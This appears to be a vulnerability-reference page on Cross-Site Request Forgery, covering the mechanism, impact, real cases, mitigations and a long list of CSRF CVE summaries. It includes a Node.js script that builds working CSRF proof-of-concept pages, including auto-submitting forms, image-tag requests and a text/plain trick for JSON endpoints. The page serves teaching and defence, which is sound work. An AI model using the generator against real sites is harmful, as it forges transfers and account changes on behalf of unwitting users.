Cross-Site Request Forgery

web MEDIUM

Cross-Site Request Forgery exploits the automatic credential inclusion behavior of web browsers.

How It Works

Cross-Site Request Forgery (CSRF) abuses the way browsers attach credentials automatically. When a user authenticates to a web application, the browser stores a session cookie and attaches it to every later request to that site, whether or not the page that initiated the request belongs to the site (subject only to the cookie's SameSite attribute). An attacker leverages this by crafting a malicious page that issues requests to the target application: a hidden form that submits itself on load, or an image whose URL triggers a state-changing action.

The attack succeeds when the victim, while authenticated to the target application, visits the attacker's page. The browser dutifully includes the victim's session cookies with the forged request, making it appear legitimate to the server. The target application executes the action as if the authenticated user intentionally initiated it.

Common attack vectors include hidden HTML forms submitted by a line of JavaScript on page load, image tags whose src attribute points at an action URL (any endpoint that changes state on GET is forgeable with nothing more than an <img>), and links embedded in phishing emails. Three conditions must hold: the credential must be one the browser attaches on its own (a session cookie, HTTP Basic credentials or a client certificate), the request must be one a plain form can produce (no custom header, and a body encoding a form can emit), and every parameter must be predictable. If the attacker can construct the entire request without knowing a secret value, the attack succeeds.
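As an added example (not code from the original page), the following Node.js snippet turns a captured request into the forgeability check and proof-of-concept page described above. The target hosts, paths, cookie and parameters are constructed for illustration, and the "unpredictable parameter" test is a heuristic. It also covers a case the paragraph does not spell out: a form cannot send application/json, but a text/plain form can produce a body that a JSON parser accepts whenever the server does not enforce the Content-Type (the Kanboard entry CVE-2026-24885 below is that situation).

```javascript
// Added example, not code from the original page: decide whether a captured
// request is forgeable cross-site and, if so, build the auto-submitting PoC
// markup. All hosts, paths, cookies and parameters below are constructed.

// Body encodings an HTML <form> can produce without a CORS preflight.
const FORM_ENCODINGS = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

function lowerKeys(obj) {
  return Object.fromEntries(Object.entries(obj).map(([k, v]) => [k.toLowerCase(), v]));
}

// Heuristic for an unpredictable value (anti-CSRF token, nonce): 16+ chars of
// base64/hex-style characters containing both letters and digits.
function looksLikeSecret(value) {
  return typeof value === 'string' && value.length >= 16 &&
    /^[A-Za-z0-9+\/=_-]+$/.test(value) && /\d/.test(value) && /[A-Za-z]/.test(value);
}

function contentType(headers) {
  return (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
}

// Classic CSRF needs all of: a browser-attached credential (cookie), no custom
// header, a body a form can emit (JSON only if the server is lenient about
// Content-Type), and no unpredictable parameter. Returns {forgeable, reasons}.
function assessForgeability(req) {
  const reasons = [];
  const h = lowerKeys(req.headers || {});
  if (!h.cookie || /^bearer\s/i.test(h.authorization || '')) {
    reasons.push('credential is not browser-attached');
  }
  const custom = Object.keys(h).filter((k) => k.startsWith('x-'));
  if (custom.length) reasons.push(`custom header required: ${custom.join(', ')}`);
  const ct = contentType(h);
  if (req.method !== 'GET' && !FORM_ENCODINGS.has(ct) && ct !== 'application/json') {
    reasons.push(`body encoding ${ct || '(none)'} cannot be produced by a form`);
  }
  for (const [k, v] of Object.entries(req.params || {})) {
    if (looksLikeSecret(v)) reasons.push(`parameter ${k} looks unpredictable`);
  }
  return { forgeable: reasons.length === 0, reasons };
}

// Form fields that reproduce the request body. For a JSON endpoint the whole
// JSON object goes into one field NAME of a text/plain form; the browser then
// sends `NAME=VALUE\r\n`, which a dummy trailing key turns into valid JSON.
function buildForgedFields(req) {
  const ct = contentType(lowerKeys(req.headers || {}));
  if (ct !== 'application/json') {
    return { enctype: 'application/x-www-form-urlencoded', fields: Object.entries(req.params || {}) };
  }
  const json = JSON.stringify(req.params || {});
  const sep = json === '{}' ? '' : ', ';
  return { enctype: 'text/plain', fields: [[`${json.slice(0, -1)}${sep}"ignore":"`, '"}']] };
}

// How a browser serialises a text/plain form (used to verify the trick above).
function encodeTextPlain(fields) {
  return fields.map(([n, v]) => `${n}=${v}\r\n`).join('');
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// The attacker's page body: an <img> for GET, an auto-submitting form otherwise.
function buildPocPage(req) {
  const { forgeable, reasons } = assessForgeability(req);
  if (!forgeable) throw new Error(`not forgeable: ${reasons.join('; ')}`);
  if (req.method === 'GET') {
    const qs = new URLSearchParams(req.params || {}).toString();
    return `<img src="${escapeHtml(req.url)}?${escapeHtml(qs)}" alt="">`;
  }
  const { enctype, fields } = buildForgedFields(req);
  const inputs = fields.map(([n, v]) =>
    `<input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`).join('\n  ');
  return `<form id="f" method="POST" action="${escapeHtml(req.url)}" enctype="${enctype}">\n  ${inputs}\n</form>\n<script>document.getElementById('f').submit();</script>`;
}

// Constructed sample: a captured fund transfer with only predictable fields.
const transferRequest = {
  method: 'POST',
  url: 'https://bank.example/transfer',
  headers: { Cookie: 'session=abc123', 'Content-Type': 'application/x-www-form-urlencoded' },
  params: { to: 'attacker', amount: '1000' },
};

console.log(assessForgeability(transferRequest));
console.log(buildPocPage(transferRequest));
```

Adding a `csrf_token` parameter to the sample, or an `X-Requested-With` header, flips `assessForgeability` to not forgeable, which is exactly the effect of the synchronizer-token and custom-header mitigations listed further down.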

Impact

  • Account takeover: Password or email address changes, locking out legitimate users
  • Financial fraud: Unauthorized fund transfers, purchases, or subscription modifications
  • Privilege escalation: Creation of admin accounts or modification of user roles
  • Data manipulation: Deletion of records, modification of settings, or content publishing
  • Social engineering amplification: Forced social media posts or message sending to spread malware

Real-World Examples

Banking applications have been frequent CSRF targets, with attackers creating malicious pages that automatically initiate wire transfers when visited by authenticated customers. One notable case involved a router configuration vulnerability where attackers embedded requests in forum posts to silently change DNS settings on victims' home routers, redirecting traffic through malicious servers.

YouTube suffered a CSRF vulnerability that allowed attackers to perform actions like adding videos to favorites or subscribing to channels on behalf of authenticated users by embedding malicious requests in external websites. The attack demonstrated how CSRF can manipulate social features at scale.

Content management systems have historically been vulnerable, with attacks forcing authenticated administrators to create new admin accounts or install malicious plugins simply by visiting attacker-controlled pages while logged into the CMS backend.

Mitigation

  • Synchronizer tokens: Generate an unpredictable, per-session or per-request token, embed it in forms, and reject any state-changing request whose token does not match the value stored server-side in the session
  • SameSite cookie attribute: Set to Strict or Lax so the browser withholds the cookie on cross-site requests; Lax still sends it on top-level GET navigations, so it protects only if state is never changed on GET, and neither value stops requests from a sibling subdomain (same site, different origin)
  • Double-submit cookies: Require a request parameter to match a cookie value; sign the value with a server-side secret and bind it to the session, otherwise an attacker who can set cookies for the site (for instance from a compromised subdomain) can plant a matching pair
  • Custom request headers: Have client-side JavaScript add a header such as X-Requested-With; a cross-origin page cannot add it without a CORS preflight, so the check holds only as long as the CORS policy does not allow that header for arbitrary origins
  • Re-authentication: Require password confirmation for sensitive actions like email or password changes
  • Origin and Referer validation: Verify that the Origin header (or, for older clients, the Referer) is your own origin, and reject state-changing requests whose Sec-Fetch-Site header is cross-site; treat Referer alone as a weaker signal, since it is often stripped or suppressed

Recent CVEs (2101)

CVE-2026-27758
EPSS 0% CVSS 4.3
MEDIUM This Month

Sl902-Swtgw124As Firmware versions up to 200.1.20 are affected by cross-site request forgery (CSRF) (CVSS 4.3).

CSRF Sl902 Swtgw124as Firmware
NVD
CVE-2026-28280
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Stored XSS in osctrl-admin prior to version 0.5.0 allows low-privileged users with query permissions to inject malicious JavaScript into the on-demand query list, affecting all users who view the page. An attacker can exploit this vulnerability to steal CSRF tokens and impersonate other users, potentially compromising the entire platform if an administrator is compromised. A patch is available in version 0.5.0.

XSS CSRF Osctrl +1
NVD GitHub
CVE-2026-3193
EPSS 0% CVSS 3.1
LOW POC Monitor

A vulnerability was detected in Chia Blockchain 2.1.0. Impacted is an unknown function of the file /send_transaction. [CVSS 3.1 LOW]

CSRF
NVD GitHub VulDB
CVE-2026-2410
EPSS 0% CVSS 4.3
MEDIUM This Month

The Disable Admin Notices - Hide Dashboard Notifications WordPress plugin up to version 1.4.2 lacks proper CSRF protection in its `showPageContent()` function, allowing unauthenticated attackers to inject arbitrary URLs into the blocked redirects list by tricking site administrators into clicking a malicious link. This could enable an attacker to redirect site traffic or manipulate administrator settings without explicit authorization. No patch is currently available for this medium-severity vulnerability.

WordPress CSRF
NVD
CVE-2026-27632
EPSS 0% CVSS 2.6
LOW POC Monitor

Talishar is a fan-made Flesh and Blood project. Prior to commit 6be3871a14c192d1fb8146cdbc76f29f27c1cf48, the Talishar application lacks Cross-Site Request Forgery (CSRF) protections on critical state-changing endpoints, specifically within `SubmitChat.php` and other game interaction handlers. [CVSS 2.6 LOW]

PHP CSRF
NVD GitHub
CVE-2026-27609
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 fail to implement CSRF protection on the AI Agent API endpoint, allowing attackers to perform unauthorized actions through the endpoint by tricking authenticated dashboard users into visiting malicious web pages. An attacker can exploit this to manipulate Parse Server applications managed through the vulnerable dashboard without explicit user consent. No patch is currently available; users can mitigate by disabling the agent configuration in their dashboard settings.

CSRF AI / ML Parse Dashboard
NVD GitHub
CVE-2026-27595
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unauthenticated attackers can execute arbitrary read/write operations against Parse Server databases in Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 by exploiting multiple chained vulnerabilities in the opt-in AI Agent API endpoint, gaining master key access without authentication or authorization checks. This affects only dashboards with an agent configuration enabled, allowing complete database compromise. The vulnerability has no available patch at this time, though version 9.0.0-alpha.8 implements fixes including authentication, CSRF validation, and proper authorization controls.

CSRF AI / ML Parse Dashboard
NVD GitHub
CVE-2026-25124
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR prior to version 8.0.0 allows low-privileged users to export sensitive patient and medical data through the message_list.php report functionality due to missing access controls. The vulnerability affects receptionists and similar roles who can bypass authorization checks to extract entire message databases containing confidential information. Public exploit code exists for this issue, though a patch is available in version 8.0.0 and later.

PHP CSRF Openemr
NVD GitHub
CVE-2024-48928
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Piwigo is an open source photo gallery application for the web. In versions on the 14.x branch, when installing, the secret_key configuration parameter is set to MD5(RAND()) in MySQL. [CVSS 7.5 HIGH]

Golang MySQL CSRF +1
NVD GitHub
CVE-2026-27518
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthorized configuration changes in Binardat 10G08-0800GSM network switches (firmware V300SP10260209 and prior) result from missing CSRF protections in the administrative interface. An attacker can craft a malicious request to trick an authenticated administrator into modifying switch settings without their knowledge or consent. No patch is currently available for this vulnerability.

CSRF 10g08 0800gsm Firmware
NVD
CVE-2026-2790
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Same-origin policy bypass in Firefox Networking JAR component before 148. Allows cross-origin data access through JAR protocol handling.

CSRF Mozilla Firefox +3
NVD
CVE-2026-27741
EPSS 0% CVSS 4.3
MEDIUM POC This Month

Bludit 3.16.1 lacks CSRF protections on administrative endpoints, allowing attackers to trick authenticated admins into uninstalling plugins or installing malicious themes via crafted web requests. Public exploit code exists for this vulnerability, enabling unauthorized modification of site functionality and potential code execution through untrusted theme installation.

CSRF Bludit
NVD GitHub
CVE-2026-23694
EPSS 0%
This Week

Aruba HiSpeed Cache (aruba-hispeed-cache) WordPress plugin versions prior to 3.0.5 contain a cross-site request forgery (CSRF) vulnerability affecting multiple administrative AJAX actions.

WordPress PHP CSRF
NVD
CVE-2026-27513
EPSS 0% CVSS 4.3
MEDIUM This Month

The Tenda F3 Wireless Router firmware lacks CSRF protections in its administrative interface, enabling attackers to trick authenticated administrators into making unauthorized configuration changes through crafted requests. An unauthenticated attacker can exploit this to modify router settings by socially engineering an admin into visiting a malicious webpage. No patch is currently available for this vulnerability.

CSRF F3 Firmware
NVD
CVE-2026-27579
EPSS 0% CVSS 7.4
HIGH This Week

CollabPlatform's misconfigured CORS policy allows credentialed cross-origin requests from attacker-controlled domains, enabling unauthorized access to sensitive user account data including email addresses, account identifiers, and MFA status. All versions of the application are affected by this vulnerability, which remains unpatched and exploitable through simple web-based attacks requiring user interaction.

CSRF Information Disclosure
NVD GitHub
CVE-2026-27146
EPSS 0% CVSS 4.5
MEDIUM POC This Month

Arbitrary file upload in GetSimple CMS results from missing CSRF protection on the administrative upload endpoint, allowing an attacker to silently inject files through a malicious webpage visited by an authenticated admin. Public exploit code exists for this vulnerability, and no patch is currently available. An attacker needs only to trick an authenticated user into visiting a crafted page to compromise the application.

CSRF Getsimple Cms
NVD GitHub
CVE-2019-25451
EPSS 0% CVSS 8.8
HIGH POC This Week

phpMoAdmin 1.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized database operations by crafting malicious requests. [CVSS 8.8 HIGH]

PHP CSRF Phpmoadmin
NVD Exploit-DB
CVE-2019-25447
EPSS 0% CVSS 4.3
MEDIUM POC This Month

OrientDB 3.0.17 GA Community Edition contains cross-site request forgery vulnerabilities that allow attackers to perform unauthorized actions by crafting malicious requests to endpoints like /database/, /command/, and /document/. [CVSS 4.3 MEDIUM]

XSS CSRF Orientdb
NVD Exploit-DB
CVE-2026-27118
EPSS 0%
PATCH Monitor

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Versions of @sveltejs/adapter-vercel prior to 6.3.2 are vulnerable to cache poisoning.

CSRF
NVD GitHub
CVE-2025-13671
EPSS 0% CVSS 6.5
MEDIUM POC This Month

Web Site Management Server versions up to 16.7.0 are affected by cross-site request forgery (CSRF) (CVSS 6.5).

CSRF Web Site Management Server
NVD GitHub
CVE-2026-26317
EPSS 0% CVSS 7.1
HIGH PATCH This Week

OpenClaw versions prior to 2026.2.14 lack proper Cross-Site Request Forgery (CSRF) protections on localhost mutation endpoints, allowing malicious websites to trigger unauthorized actions against a victim's local AI assistant instance such as opening tabs, modifying storage, or controlling browser functions. The vulnerability affects the browser control plane through cross-origin requests initiated from the victim's browser context, despite the service's loopback binding. Version 2026.2.14 and later mitigate this by validating Origin/Referer headers and rejecting mutating requests from cross-site origins.

CSRF AI / ML Openclaw
NVD GitHub
CVE-2026-27090
EPSS 0% CVSS 4.3
MEDIUM This Month

WP Moose Kenta Companion kenta-companion is affected by cross-site request forgery (csrf) (CVSS 4.3).

CSRF
NVD
CVE-2026-27050
EPSS 0% CVSS 5.4
MEDIUM This Month

ThimPress RealPress versions up to 1.1.0 are vulnerable to cross-site request forgery attacks that could allow attackers to perform unauthorized actions on behalf of authenticated users. An attacker can exploit this vulnerability by tricking users into visiting a malicious webpage, resulting in integrity and availability impacts. No patch is currently available for this vulnerability.

CSRF
NVD
CVE-2026-25422
EPSS 0% CVSS 5.4
MEDIUM This Month

Themes4WP Popularis Extra popularis-extra is affected by cross-site request forgery (csrf) (CVSS 5.4).

CSRF
NVD
CVE-2026-25411
EPSS 0% CVSS 4.3
MEDIUM This Month

themastercut Revision Manager TMC revision-manager-tmc is affected by cross-site request forgery (csrf) (CVSS 4.3).

CSRF
NVD
CVE-2026-25337
EPSS 0% CVSS 5.4
MEDIUM This Month

Coachify versions 1.1.5 and earlier contain a cross-site request forgery vulnerability that allows unauthenticated attackers to perform unintended actions on behalf of authenticated users through crafted requests. An attacker can leverage this to modify user data or trigger unwanted functionality with user interaction. No patch is currently available for this vulnerability.

CSRF
NVD
CVE-2026-25322
EPSS 0% CVSS 5.4
MEDIUM This Month

PublishPress PublishPress Revisions revisionary is affected by cross-site request forgery (csrf) (CVSS 5.4).

CSRF
NVD
CVE-2026-25319
EPSS 0% CVSS 4.3
MEDIUM This Month

wpzita Zita Elementor Site Library zita-site-library is affected by cross-site request forgery (csrf) (CVSS 4.3).

CSRF
NVD
CVE-2026-25242
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Act Now

Unauthenticated file upload in Gogs self-hosted Git service 0.13.4 and below. Default configuration exposes file upload endpoints. PoC and patch available.

CSRF Gogs Suse
NVD GitHub
CVE-2026-1455
EPSS 0% CVSS 4.3
MEDIUM This Month

Whatsiplus Scheduled Notification for Woocommerce (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

WordPress CSRF
NVD
CVE-2026-0722
EPSS 0% CVSS 6.5
MEDIUM This Month

The Shield Security plugin for WordPress versions up to 21.0.8 contains a CSRF vulnerability that allows attackers to bypass nonce verification through a manipulated parameter, enabling SQL injection attacks to extract database contents. An unauthenticated attacker can exploit this by tricking a site administrator into clicking a malicious link, potentially compromising sensitive information stored in the WordPress database. No patch is currently available for affected installations.

WordPress SQLi CSRF
NVD
CVE-2025-14167
EPSS 0% CVSS 4.3
MEDIUM This Month

The Remove Post Type Slug plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to incorrect nonce validation logic that uses OR (||) instead of AND (&&), causing the validation to fail when the nonce field is not empty OR when verification fails, rather than when it's empty AND verification fails. This makes it possible for unauthenticated attackers to modify the plugin's post type slug removal settings via a forged request ...

WordPress CSRF PHP
NVD
CVE-2025-13438
EPSS 0% CVSS 4.3
MEDIUM This Month

The Page Title, Description & Open Graph Updater plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.02. This is due to missing nonce validation on multiple AJAX actions including dieno_update_page_title. [CVSS 4.3 MEDIUM]

WordPress CSRF PHP
NVD
CVE-2025-13413
EPSS 0% CVSS 4.3
MEDIUM This Month

Country Blocker for AdSense (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

WordPress CSRF PHP
NVD
CVE-2025-12821
EPSS 0% CVSS 8.8
HIGH This Week

The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 0.2.5.6 to 0.2.6.1. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. [CVSS 8.8 HIGH]

WordPress RCE CSRF +1
NVD
CVE-2025-12172
EPSS 0% CVSS 4.3
MEDIUM This Month

Mailchimp List Subscribe Form (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

WordPress CSRF PHP
NVD
CVE-2025-70062
EPSS 0% CVSS 6.5
MEDIUM POC This Month

Hospital Management System versions up to 4.0 are affected by cross-site request forgery (CSRF) (CVSS 6.5).

PHP CSRF Hospital Management System
NVD GitHub
CVE-2026-2658
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-site request forgery (CSRF) in newbee-mall affects multiple endpoints, allowing unauthenticated remote attackers to perform unauthorized actions on behalf of authenticated users. Public exploit code exists for this vulnerability. No patch is currently available, and the project maintainers have not responded to the early disclosure notification.

CSRF
NVD VulDB GitHub
CVE-2026-2112
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthenticated attackers can delete all pending comments in WordPress sites running the Dam Spam plugin up to version 1.0.8 by exploiting missing CSRF protections, requiring only that an administrator be tricked into clicking a malicious link. An attacker with this capability can disrupt comment moderation workflows and potentially suppress legitimate user feedback. No patch is currently available for this vulnerability.

WordPress CSRF
NVD GitHub
CVE-2026-2023
EPSS 0% CVSS 4.3
MEDIUM This Month

The WP Plugin Info Card plugin for WordPress versions up to 6.2.0 contains a cross-site request forgery vulnerability in its AJAX handler due to disabled nonce validation, allowing unauthenticated attackers to create or modify custom plugin entries if a site administrator can be tricked into clicking a malicious link. An attacker could leverage this to inject arbitrary plugin configurations that could be used for further compromise of the WordPress installation. No patch is currently available.

WordPress CSRF
NVD GitHub
CVE-2026-1072
EPSS 0% CVSS 4.3
MEDIUM This Month

Keybase.io Verification (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

WordPress CSRF
NVD
CVE-2025-27904
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Db2 Recovery Expert versions up to 5.5.0 are affected by cross-site request forgery (CSRF) (CVSS 6.5).

IBM Linux Windows +2
NVD
CVE-2025-36018
EPSS 0% CVSS 6.5
MEDIUM This Month

IBM Concert 1.0.0 through 2.1.0 for Z hub component is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. [CVSS 6.5 MEDIUM]

IBM CSRF Concert
NVD
CVE-2024-55271
EPSS 0% CVSS 3.5
LOW POC Monitor

Gym Management System versions up to 1.0 are affected by cross-site request forgery (CSRF) (CVSS 3.5).

PHP CSRF
NVD GitHub
CVE-2026-1394
EPSS 0% CVSS 4.3
MEDIUM This Month

The WP Quick Contact Us plugin for WordPress through version 1.0 lacks proper nonce validation in its settings update function, enabling unauthenticated attackers to modify plugin configuration through cross-site request forgery if a site administrator can be tricked into clicking a malicious link. This could allow attackers to alter plugin behavior and potentially compromise site functionality without direct authentication.

WordPress CSRF
NVD
CVE-2025-14873
EPSS 0% CVSS 4.3
MEDIUM This Month

The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. [CVSS 4.3 MEDIUM]

WordPress CSRF PHP
NVD
CVE-2025-14852
EPSS 0% CVSS 4.3
MEDIUM This Month

The MDirector Newsletter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.5.8. This is due to missing nonce verification on the mdirectorNewsletterSave function. [CVSS 4.3 MEDIUM]

WordPress CSRF
NVD
CVE-2026-1983
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthorized event deletion in the WordPress SEATT plugin through version 1.5.0 stems from inadequate CSRF protections on the event removal function. An attacker can trick site administrators into clicking a malicious link to remove arbitrary events without authentication. No patch is currently available for this vulnerability.

WordPress CSRF
NVD
CVE-2026-26075
EPSS 0% CVSS 5.4
MEDIUM This Month

FastGPT's web and HTTP data acquisition nodes fail to properly validate internal network addresses, allowing unauthenticated remote attackers to bypass network isolation controls and access sensitive internal resources. This vulnerability affects FastGPT versions prior to 4.14.7 and requires user interaction to exploit. The vulnerability has a CVSS score of 5.4 and currently has no available patch.

CSRF AI / ML Fastgpt
NVD GitHub
CVE-2020-37172
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Avideo versions up to 8.1 are affected by a weak password recovery mechanism for forgotten passwords (CVSS 5.3).

CSRF Avideo
NVD GitHub Exploit-DB
CVE-2020-37158
EPSS 0% CVSS 5.3
MEDIUM POC This Month

AVideo Platform 8.1 contains a cross-site request forgery vulnerability that allows attackers to reset user passwords by exploiting the password recovery mechanism. [CVSS 5.3 MEDIUM]

CSRF Avideo
NVD GitHub Exploit-DB
CVE-2019-25313
EPSS 0% CVSS 4.0
MEDIUM POC This Month

FlexNet Publisher 11.12.1 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. [CVSS 4.0 MEDIUM]

CSRF
NVD Exploit-DB
CVE-2026-2345
EPSS 0% CVSS 3.6
LOW Monitor

Proctorio Chrome Extension is a browser extension used for online proctoring. The extension contains multiple window.addEventListener('message', ...) handlers that do not properly validate the origin of incoming messages. [CVSS 3.6 LOW]

CSRF Chrome
NVD
CVE-2026-1215
EPSS 0% CVSS 4.3
MEDIUM This Month

The MMA Call Tracking WordPress plugin through version 2.3.15 lacks proper CSRF protection on its admin configuration page, allowing attackers to modify call tracking settings by tricking site administrators into clicking malicious links. An unauthenticated attacker can alter plugin configurations without authorization through forged requests. No patch is currently available for this vulnerability.

WordPress CSRF
NVD
CVE-2026-1997
EPSS 0% CVSS 5.3
MEDIUM This Month

HP OfficeJet Pro printers (D9l18a, D9l20a, D9l21a, D9l63a firmware) are vulnerable to information disclosure through CORS misconfiguration when administrators enable the feature on the Embedded Web Server. An unauthenticated remote attacker can exploit this to access sensitive device resources from untrusted web origins. CORS remains disabled by default as a mitigation, but organizations that have explicitly enabled it should apply patches when available.

CSRF Hp J3p68a Firmware +40
NVD
CVE-2026-24885
EPSS 0% CVSS 5.7
MEDIUM POC PATCH This Month

Kanboard versions prior to 1.2.50 contain a CSRF vulnerability in the ProjectPermissionController that accepts text/plain content instead of enforcing application/json, enabling attackers to modify project user roles through malicious forms. An authenticated admin visiting a malicious website could be tricked into unknowingly changing role assignments, potentially granting unauthorized access to projects. Public exploit code exists for this vulnerability, though a patch is available in version 1.2.50 and later.

CSRF Kanboard
NVD GitHub
CVE-2026-25812
EPSS 0% CVSS 8.8
HIGH This Week

Placipy 1.0.0 fails to implement CSRF protections while permitting credentialed cross-origin requests, allowing unauthenticated attackers to perform unauthorized actions on behalf of logged-in users through malicious websites. An attacker can exploit this vulnerability to modify placement records, access sensitive educational data, or compromise institutional operations without user knowledge. No patch is currently available.

CSRF Placipy
NVD GitHub
CVE-2025-66630
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Go Fiber web framework before 2.52.11 has a weak PRNG vulnerability (on Go < 1.24) that makes session tokens predictable, enabling session hijacking.

Golang CSRF Fiber +2
NVD GitHub
CVE-2025-66595
EPSS 0% CVSS 5.4
MEDIUM This Month

A vulnerability has been found in FAST/TOOLS provided by Yokogawa Electric Corporation. This product is vulnerable to Cross-Site Request Forgery (CSRF). [CVSS 5.4 MEDIUM]

CSRF
NVD
CVE-2026-1082
EPSS 0% CVSS 4.3
MEDIUM This Month

The TITLE ANIMATOR plugin for WordPress lacks CSRF protection on its settings page, allowing unauthenticated attackers to modify plugin configuration through forged requests if a site administrator clicks a malicious link. This vulnerability affects all versions up to 1.0 and requires social engineering to exploit but poses a direct integrity risk to plugin functionality and site configuration.

WordPress PHP CSRF
NVD
CVE-2020-37106
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Business Live Chat Software 1.0 contains a cross-site request forgery vulnerability that allows attackers to change user account roles without authentication. [CVSS 5.3 MEDIUM]

CSRF
NVD Exploit-DB
CVE-2020-37079
EPSS 0% CVSS 4.3
MEDIUM POC This Month

Wing FTP Server versions prior to 6.2.7 contain a cross-site request forgery (CSRF) vulnerability in the web administration interface that allows attackers to delete admin users. [CVSS 4.3 MEDIUM]

CSRF Wing Ftp Server
NVD Exploit-DB
CVE-2026-1785
EPSS 0% CVSS 4.3
MEDIUM This Month

The Code Snippets WordPress plugin through version 3.9.4 lacks nonce validation on cloud snippet operations, allowing unauthenticated attackers to conduct cross-site request forgery attacks against logged-in administrators. By tricking an admin into visiting a malicious page, attackers can force unauthorized downloads or updates of cloud snippets. No patch is currently available for this vulnerability.

WordPress CSRF
NVD GitHub
CVE-2020-37149
EPSS 0% CVSS 8.1
HIGH POC This Week

Ew-7438Rpn Mini Firmware versions up to 1.27 are affected by cross-site request forgery (CSRF) (CVSS 8.1).

CSRF Ew 7438rpn Mini Firmware
NVD Exploit-DB
CVE-2020-37145
EPSS 0% CVSS 4.3
MEDIUM POC This Month

HRSALE 1.1.8 contains a cross-site request forgery vulnerability that allows attackers to add unauthorized administrative users through the employee registration form. [CVSS 4.3 MEDIUM]

CSRF
NVD Exploit-DB
CVE-2020-37144
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Exagate SYSGuard 6001 contains a cross-site request forgery vulnerability that allows attackers to create unauthorized admin accounts through a crafted HTML form. [CVSS 5.3 MEDIUM]

PHP CSRF
NVD Exploit-DB
CVE-2020-37118
EPSS 0% CVSS 3.5
LOW POC Monitor

P5 FNIP-8x16A FNIP-4xSH 1.0.20 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user interaction. [CVSS 3.5 LOW]

CSRF
NVD Exploit-DB
CVE-2025-68722
EPSS 0% CVSS 8.8
HIGH POC This Week

Axigen Mail Server before 10.5.57 and 10.6.x before 10.6.26 contains a Cross-Site Request Forgery (CSRF) vulnerability in the WebAdmin interface through improper handling of the _s (breadcrumb) parameter. The application accepts state-changing requests via the GET method and automatically processes base64-encoded commands queued in the _s parameter immediately after administrator authentication. Attackers can craft malicious URLs that, when clicked by administrators, execute arbitrary adminis...

CSRF Axigen Mail Server
NVD GitHub
CVE-2024-40685
EPSS 0% CVSS 4.3
MEDIUM This Month

Log Analysis versions 1.3.5.0 through 1.3.8.3 are affected by cross-site request forgery (CSRF) (CVSS 4.3).

IBM Industrial CSRF
NVD
CVE-2026-1835
EPSS 0% CVSS 4.3
MEDIUM This Month

lcg0124 BootDo is susceptible to cross-site request forgery (CSRF) attacks due to insufficient request validation, allowing remote attackers to perform unauthorized actions on behalf of authenticated users. Public exploit code exists for this vulnerability, though no patch is currently available. The rolling release model used by this product complicates version tracking for affected and patched instances.

CSRF
NVD GitHub VulDB
CVE-2026-25155
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Qwik versions prior to 1.12.0 contain a regular expression parsing error in the isContentType function that allows attackers to bypass Content-Type validation through crafted headers. An attacker can exploit this to perform cross-site request forgery (CSRF) attacks by manipulating how the application interprets request content types. A patch is available in version 1.12.0.

CSRF Qwik
NVD GitHub
CVE-2026-25151
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Qwik is a performance focused javascript framework. [CVSS 5.9 MEDIUM]

CSRF Qwik
NVD GitHub
CVE-2020-37096
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Ew-7438Rpn Mini Firmware versions up to 1.13 are affected by cross-site request forgery (CSRF) (CVSS 5.3).

CSRF Ew 7438rpn Mini Firmware
NVD Exploit-DB
CVE-2020-37091
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Maian Support Helpdesk 4.3 contains a cross-site request forgery vulnerability that allows attackers to create administrative accounts without authentication. [CVSS 5.3 MEDIUM]

PHP CSRF
NVD Exploit-DB
CVE-2026-24434
EPSS 0% CVSS 6.5
MEDIUM This Month

Tenda AC7 firmware through V03.03.03.01_cn lacks CSRF protections on administrative web functions, enabling attackers to trick authenticated administrators into executing unauthorized configuration changes. An unauthenticated attacker can craft malicious requests that, when visited by an admin, modify router settings without their knowledge or consent. No patch is currently available.

CSRF Ac7 Firmware
NVD
CVE-2025-52628
EPSS 0% CVSS 4.6
MEDIUM This Month

